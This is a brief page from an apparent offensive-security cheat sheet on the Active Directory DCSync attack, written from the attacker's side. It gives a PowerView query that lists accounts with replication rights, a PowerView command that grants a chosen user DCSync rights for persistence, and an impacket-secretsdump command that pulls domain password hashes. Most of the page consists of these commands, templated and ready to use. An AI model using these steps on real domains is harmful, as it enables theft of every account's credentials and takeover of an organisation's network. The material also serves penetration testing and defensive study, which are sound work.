dcsync

Allows an attacker to simulate the behavior of Domain Controller (DC) in order to retrieve password data via domain replication. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.

Check for users with DCSync

Get-ObjectAcl -DistinguishedName "dc=DOMAIN,dc=COM" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}

Usage

using powerview

Add-ObjectACL -TargetDistinguishedName "dc=DOMAIN,dc=COM" -PrincipalIdentity USER -Rights DCSync

post DCSync

impacket-secretsdump DOMAIN/USER:['PASS']@IP [-just-dc] [just-dc-user USER]
Previousgroup policy managementNextkerberos backdoor

Last updated